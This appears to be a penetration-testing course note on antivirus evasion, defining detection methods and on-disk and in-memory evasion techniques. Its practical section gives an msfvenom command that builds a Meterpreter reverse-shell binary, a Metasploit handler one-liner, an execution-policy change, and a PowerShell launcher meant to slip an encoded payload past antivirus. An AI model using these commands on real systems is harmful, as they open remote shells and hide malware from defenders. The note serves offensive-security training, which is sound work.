Module 17 (Antivirus Evasion)

Methods of Detection Malicious code

Signature-Based Detection
Heuristic-Based Detection
Behavioral-Based Detection

Bypassing Antivirus

On-Disk Evasion
- packers
- Obfuscators
- Crypters
- Software Protectors
In-Memory Evasion
- Remote Process Memory injection
- Relective DLL Injection
- Process Hollowing
- lnline hooking

Methods of Detecting Malicious Code

Signature-Based Detection

Identifies known malware based on predefined signatures.

Heuristic-Based Detection

Analyzes the behavior of code to identify potential threats based on heuristics.

Behavioral-Based Detection

Examines the behavior of code during execution to identify suspicious activities.

ON-Disk Evasion

Packers

Tools that compress or encrypt executable files to obfuscate their content.

Obfuscators

Techniques that obscure the code's logic and structure to make it harder to analyze.

Crypters

Tools that encrypt executable files to evade signature-based detection.

Software Protectors

Programs that protect executable files from analysis and tampering.

In-Memory Evasion

Remote Process Memory Injection

Injecting code into the memory space of a remote process.

Reflective DLL Injection

Loading a DLL into a process's memory without putting it on disk.

Process Hollowing

Creating a new suspended process and replacing its memory space with malicious code.

Inline Hooking

Modifying function pointers to redirect execution flow.

Practical

Manual

Avira Free V 15.0.34.16

Download Avira Free Antivirus 15.0.34.16 - Download - Filepuma.comwww.filepuma.com

Simple reverse shell binary

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f exe > binary.exe

Power shell ExecutionPolicy

powershell Get-ExecutionPolicy -Scope CurrentUser 
powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
powershell Get-ExecutionPolicy -Scope CurrentUser

metasploit one line command

msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LPORT 4444; set LHOST 192.168.1.6"

Powershell AV bypass payload

$jHs = '<BASE64_ENCODED_PAYLOAD>'
$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($jHs))
$TmU = "-e "
if([IntPtr]::Size -eq 8){
    $YZfX = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell"
    iex "& $YZfX $TmU $e"
} else {
    iex "& powershell $TmU $e"
}

Tools

Shellter
the fat rat
Empire
veil

PreviousModule 16 (File Transfers)NextWindows

Last updated 1 year ago